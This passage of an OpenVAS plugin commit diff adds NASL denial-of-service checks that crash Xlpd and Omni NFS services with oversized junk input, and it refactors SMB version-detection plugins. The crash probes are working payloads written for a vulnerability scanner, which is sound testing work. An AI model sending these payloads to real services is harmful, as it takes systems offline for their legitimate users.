+ crapdata + raw_string(0x0d,0x0a); + +send(socket:soc, data:req); +close(soc); + +sleep(10); + +soc1 = open_sock_tcp(port); +if(!soc1) { + security_warning(port:port); + exit(0); + +} else { + + for(i=0;i<5;i++) { + if(!ftp_recv_line(socket:soc1)) { + security_warning(port:port); + close(soc1); + exit(0); + } + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/Xlpd_36610.nasl =================================================================== --- trunk/openvas-plugins/scripts/Xlpd_36610.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/Xlpd_36610.nasl 2009-10-08 18:03:34 UTC (rev 5443) @@ -0,0 +1,90 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Xlpd Remote Denial of Service Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100296); + script_bugtraq_id(36610); + script_version ("1.0-$Revision$"); + + script_name("Xlpd Remote Denial of Service Vulnerability"); + +desc = "Overview: +Xlpd is prone to a denial-of-service vulnerability because it fails to +adequately validate user-supplied input. + +An attacker can exploit this issue to crash the affected application, +denying service to legitimate users. Given the nature of this issue, +the attacker may also be able to run arbitrary code, but this has not +been confirmed. + +Xlpd 3.0 is vulnerable; other versions may also be affected. + +References: +http://www.securityfocus.com/bid/36610 +http://www.netsarang.com/products/xlp_detail.html +http://www.securityfocus.com/archive/1/507029 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Xlpd is prone to a denial-of-service vulnerability"); + script_category(ACT_DENIAL); + script_family("Denial of Service"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/lpd", 515); + exit(0); +} + +include("misc_func.inc"); + +if(safe_checks())exit(0); + +port = get_kb_item("Services/lpd"); +if(!port)port="515"; + +if(!get_port_state(port))exit(0); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +req = crap(data:raw_string(0x41),length:100000); +send(socket:soc, data:req); +close(soc); + +sleep(2); + +soc1 = open_sock_tcp(port); +if(!soc1) { + security_warning(port:port); + exit(0); +} else { + close(soc1); +} + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/Xlpd_36610.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl 2009-10-08 18:03:34 UTC (rev 5443) @@ -1,31 +1,7 @@ -# # Script Written By Ferdy Riphagen # Script distributed under the GNU GPLv2 License. -# -# Tenable grants a special exception for this plugin to use the library -# 'smb_func.inc'. This exception does not apply to any modified version of -# this plugin. -# -# kst-depend-smb +# Modified by Michael Meyer -desc = " -Synopsis : - -There is a VPN client installed on the remote Windows host. - -Description : - -The Cisco VPN Client is installed on the remote Windows host. This -software can be used for secure connectivity. - -See also : - -http://www.cisco.com/en/US/products/sw/secursw/ps2308/index.html - -Risk factor : - -None"; - if (description) { script_id(80037); script_version("$Revision: 1.5 $"); @@ -33,107 +9,45 @@ name = "Cisco VPN Client Version Detection"; script_name(name); + + desc = "Overview: This script is detects the installed version of Cisco VPN + Client and sets the result in KB. + + Risk Factor: Informational"; + summary = "Detects the version number of the Cisco VPN Client in use"; script_summary(summary); script_category(ACT_GATHER_INFO); - script_family("Windows"); + script_family("Service detection"); script_copyright("This script is Copyright (C) 2007 Ferdy Riphagen"); - script_require_ports(139, 445); script_dependencies("secpod_reg_enum.nasl"); script_require_keys("SMB/login", "SMB/password", "SMB/name", "SMB/transport"); exit(0); } -include("smb_func.inc"); -include("misc_func.inc"); +include("smb_nt.inc"); +include("secpod_smb_func.inc"); -login = kb_smb_login(); -pass = kb_smb_password(); -port = kb_smb_transport(); -name = kb_smb_name(); -domain = kb_smb_domain(); - -if(!get_port_state(port)) exit(0); -soc = open_sock_tcp(port); -if(!soc || (!name)) exit(0); - -function cleanup(opt) { - - if (opt == 1) exit(0); - else if (opt == 2) { - NetUseDel(); - exit(0); - } +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); } -# modified 'get_dword' to get the bytes in the right format. -function get_dword2(blob, pos) { - global_var blob, pos; - - if (pos > (strlen(blob) - 4)) return NULL; - return (ord(blob[pos]) << 16) + - (ord(blob[pos+1]) << 24) + - (ord(blob[pos+2])) + - (ord(blob[pos+3]) << 8); +if(!registry_key_exists(key:"SOFTWARE\Cisco Systems\VPN Client")){ + exit(0); } -session_init(socket:soc, hostname:name); -ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); -if (ipc != 1) cleanup(opt:2); - -hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE); -if (isnull(hklm)) cleanup(opt:2); - key = "SOFTWARE\Cisco Systems\VPN Client"; -regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED); -if (!isnull(regopen)) { - value = RegQueryValue(handle:regopen, item:"InstallPath"); - RegCloseKey(handle:regopen); - RegCloseKey(handle:hklm); - if(!isnull(value)) path = value[1]; - else cleanup(opt:2); -} -else cleanup(opt:2); +path = registry_get_sz(key:key, item:"InstallPath"); -share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path); -exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1vpngui.exe", string:path); - -conn = NetUseAdd(login:login, password:pass, domain:domain, share:share); -if (conn != 1) cleanup(opt:1); - -fopen = CreateFile( - file:exe, - desired_access:GENERIC_READ, - file_attributes:FILE_ATTRIBUTE_NORMAL, - share_mode:FILE_SHARE_READ, - create_disposition:OPEN_EXISTING -); - -if (isnull(fopen)) cleanup(opt:2); -ret = GetFileVersionEx(handle:fopen); -CloseFile(handle:fopen); - -if (!isnull(ret)) children = ret['Children']; -if (!isnull(children)) info = children['VarFileInfo']; -if (isnull(info)) cleanup(opt:2); - -trans = toupper(hexstr(dec2hex( - num:get_dword2( - blob:info['Translation'], pos:0)))); -if (isnull(trans)) cleanup(opt:2); - -fileinfo = children['StringFileInfo']; -if (!isnull(fileinfo)) data = fileinfo[trans]; -if (!isnull(data)) ver = data['ProductVersion']; - -if (!isnull(ver)) { - set_kb_item(name:"SMB/CiscoVPNClient/Version", value:ver); - report = string( - desc, "\n\n", - "Plugin output :\n\n", - "Version ", ver, " of the Cisco VPN Client is installed.\n" - ); - security_note(port:port, data:report); +if(path) +{ + file = path + "\vpngui.exe"; + version = GetVersionFromFile(file:file,verstr:"prod"); + if(!isnull(version)){ + set_kb_item(name:"SMB/CiscoVPNClient/Version", value:version); + exit(0); + } } -cleanup(opt:2); + +exit(0); Modified: trunk/openvas-plugins/scripts/secpod_smb_func.inc =================================================================== --- trunk/openvas-plugins/scripts/secpod_smb_func.inc 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/secpod_smb_func.inc 2009-10-08 18:03:34 UTC (rev 5443) @@ -695,3 +695,64 @@ (ord(data[2]) << 16) + (ord(data[3]) << 24)); } } + +function GetVersionFromFile(file, verstr) { + + local_var file, share, verstr, mshare, soc, r, prot, uid, tid, ver; + + mshare = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:file); + file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:file); + + soc = open_sock_tcp(port); + if(!soc){ + return NULL; + } + + r = smb_session_request(soc:soc, remote:name); + if(!r) + { + close(soc); + return NULL; + } + + prot = smb_neg_prot(soc:soc); + if(!prot) + { + close(soc); + return NULL; + } + + r = smb_session_setup(soc:soc, login:login, password:pass, + domain:domain, prot:prot); + if(!r) + { + close(soc); + return NULL; + } + + uid = session_extract_uid(reply:r); + r = smb_tconx(soc:soc, name:name, uid:uid, share:mshare); + + tid = tconx_extract_tid(reply:r); + if(!tid) + { + close(soc); + return NULL; + } + fid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file); + if(!fid) + { + close(soc); + return NULL; + } + if(isnull(verstr)) { + ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid); + } else { + ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid,verstr:verstr); + } + close(soc); + + return ver; + + +} Modified: trunk/openvas-plugins/scripts/smb_explorer_version.nasl =================================================================== --- trunk/openvas-plugins/scripts/smb_explorer_version.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/smb_explorer_version.nasl 2009-10-08 18:03:34 UTC (rev 5443) @@ -97,7 +97,7 @@ #==================================================================# # Main code # #==================================================================# -include("smb_func.inc"); + warning = 0; access = get_kb_item("SMB/registry_full_access"); Modified: trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl 2009-10-08 18:03:34 UTC (rev 5443) @@ -1,34 +1,17 @@ # # Script Written By Ferdy Riphagen # Script distributed under the GNU GPLv2 License. -# -# Tenable grants a special exception for this plugin to use the library -# 'smb_func.inc'. This exception does not apply to any modified version of -# this plugin. -# -# kst-depend-smb +# Modified by Michael Meyer if (description) { script_id(80044); script_version("$Revision: 1.1 $"); - desc = " -Synopsis : + desc = "Overview: This script detects the installed version of +SonicWall Global VPN Client and sets the result in KB. -There is a VPN client installed on the remote host. +Risk Factor: Informational"; -Description : - -The SonicWall Global VPN Client is installed on the remote system. This -software can be used to establish secure remote connections. - -See also : - -http://www.sonicwall.com/ - -Risk factor : - -None"; script_description(desc); name = "SonicWall Global VPN Client Detection"; @@ -37,7 +20,7 @@ script_summary(summary); script_category(ACT_GATHER_INFO); - script_family("Windows"); + script_family("Service detection"); script_copyright("This script is Copyright (C) 2008 Ferdy Riphagen"); script_require_ports(139, 445); @@ -46,83 +29,30 @@ exit(0); } -include("smb_func.inc"); -include("misc_func.inc"); +include("smb_nt.inc"); +include("secpod_smb_func.inc"); -login = kb_smb_login(); -pass = kb_smb_password(); -port = kb_smb_transport(); -name = kb_smb_name(); -domain = kb_smb_domain(); - -if(!get_port_state(port)) exit(0); -soc = open_sock_tcp(port); -if(!soc || (!name)) exit(0); - -session_init(socket:soc, hostname:name); -ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); -if (ipc != 1) exit(0); - -hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE); -if (isnull(hklm)) { - NetUseDel(); - exit(0); +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); } -path = NULL; key = "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SWGVpnClient.exe"; -regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED); -if (!isnull(regopen)) { - value = RegQueryValue(handle:regopen, item:"Path"); - RegCloseKey(handle:regopen); - RegCloseKey(handle:hklm); - if(!isnull(value)) path = value[1]; -} -if (isnull(path)) { - RegCloseKey(handle:hklm); - NetUseDel(); - exit(0); -} -share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path); -exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SWGVpnClient.exe", string:path); - -conn = NetUseAdd(login:login, password:pass, domain:domain, share:share); -if (conn != 1) { - NetUseDel(); - exit(0); +if(!registry_key_exists(key:key)){ + exit(0); } -fopen = CreateFile( - file:exe, - desired_access:GENERIC_READ, - file_attributes:FILE_ATTRIBUTE_NORMAL, - share_mode:FILE_SHARE_READ, - create_disposition:OPEN_EXISTING -); +path = registry_get_sz(key:key, item:"Path"); -if (isnull(fopen)) { - NetUseDel(); - exit(0); -} +if(path) { -ret = GetFileVersion(handle:fopen); -CloseFile(handle:fopen); -NetUseDel(); + file = path + "\SWGVpnClient.exe"; + version = GetVersionFromFile(file:file,verstr:"prod"); + if(!isnull(version)){ + set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:version); + set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path); + exit(0); + } +} -if (!isnull(ret)) -{ - ver = string(ret[0] + '.' + ret[1] + '.' + ret[2] + '.' + ret[3]); - - set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:ver); - set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path); - - report = string("\n", - "Version ", ver, " of the SonicWall Global VPN Client is installed\n", - "under :\n", - "\n", - " ", path - ); - security_note(port:port, extra:report); -} exit(0); Modified: trunk/openvas-plugins/scripts/spybot_detection.nasl =================================================================== --- trunk/openvas-plugins/scripts/spybot_detection.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/spybot_detection.nasl 2009-10-08 18:03:34 UTC (rev 5443) @@ -1,15 +1,9 @@ # # (C) Josh Zlatin-Amishav and Tenable Network Security # GPLv2 -# -# Tenable grants a special exception for this plugin to use the library -# 'smb_func.inc'. This exception does not apply to any modified version of -# this plugin. -# -# kst-depend-smb +# Modified by Michael Meyer - desc = " -Synopsis : + desc = "Synopsis : The remote Windows host has a spyware detection program installed on it. @@ -20,11 +14,9 @@ kinds from your computer. See also : - http://www.safer-networking.org/ Risk factor : - None"; if(description) @@ -34,195 +26,175 @@ name = "Spybot Search & Destroy Detection"; script_name(name); - + script_description(desc); - + summary = "Checks whether Spybot Search & Destroy is installed"; script_summary(summary); script_category(ACT_GATHER_INFO); - + script_copyright("This script is Copyright (C) 2006 Josh Zlatin-Amishav and Tenable Network Security"); - family = "Windows"; + family = "Service detection"; script_family(family); - + script_dependencies("secpod_reg_enum.nasl"); - script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport"); + script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport"); script_require_ports(139, 445); exit(0); } +include("smb_nt.inc"); +include("secpod_smb_func.inc"); +include("global_settings.inc"); -include("smb_func.inc"); -include("secpod_reg.inc"); + if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); + } + name = kb_smb_name(); + login = kb_smb_login(); + pass = kb_smb_password(); + domain = kb_smb_domain(); + port = kb_smb_transport(); -name = kb_smb_name(); -login = kb_smb_login(); -pass = kb_smb_password(); -domain = kb_smb_domain(); -port = kb_smb_transport(); + if(!port) port = 139; + if(!get_port_state(port))exit(0); -if(!get_port_state(port))exit(0); -soc = open_sock_tcp(port); -if(!soc)exit(1); + soc = open_sock_tcp(port); + if(!soc){ + exit(0); + } -session_init(socket:soc, hostname:name); -r = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); -if ( r != 1 ) -{ - NetUseDel(); - exit(0); -} + r = smb_session_request(soc:soc, remote:name); + if(!r) + { + close(soc); + exit(0); + } + prot = smb_neg_prot(soc:soc); + if(!prot) + { + close(soc); + exit(0); + } -# First find where the executable is installed on the remote host -# Connect to remote registry. -hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE); -if (isnull(hklm)) -{ - if (log_verbosity > 1) debug_print("can't connect to the remote registry!", level:0); - NetUseDel(); - exit(0); -} + r = smb_session_setup(soc:soc, login:login, password:pass, + domain:domain, prot:prot); + if(!r) + { + close(soc); + exit(0); + } + uid = session_extract_uid(reply:r); + r = smb_tconx(soc:soc, name:name, uid:uid, share:"IPC$"); + tid = tconx_extract_tid(reply:r); + if(!tid) + { + close(soc); + exit(0); + } -# Determine where Spybot S&D is installed -key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Spybot - Search & Destroy_is1"; -key_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED); -if (!isnull(key_h)) { - value = RegQueryValue(handle:key_h, item:"Inno Setup: App Path"); - if (!isnull(value)) path = value[1]; - else path = NULL; - - RegCloseKey(handle:key_h); -} -else path = NULL; -RegCloseKey(handle:hklm); + r = smbntcreatex(soc:soc, uid:uid, tid:tid, name:"\winreg"); + if(!r) + { + close(soc); + exit(0); + } -if (isnull(path)) { - NetUseDel(); - exit(0); -} + pipe = smbntcreatex_extract_pipe(reply:r); + if(!pipe) + { + close(soc); + exit(0); + } + r = pipe_accessible_registry(soc:soc, uid:uid, tid:tid, pipe:pipe); + if(!r) + { +

OpenVAS-Server is a forked development of Nessus 2.2. The fork happened because Nessus 3 changed to a proprietary license model. Nessus 2.2.x development stopped for third party contributors. @@ -72,7 +79,7 @@ mailing list and ask for support there.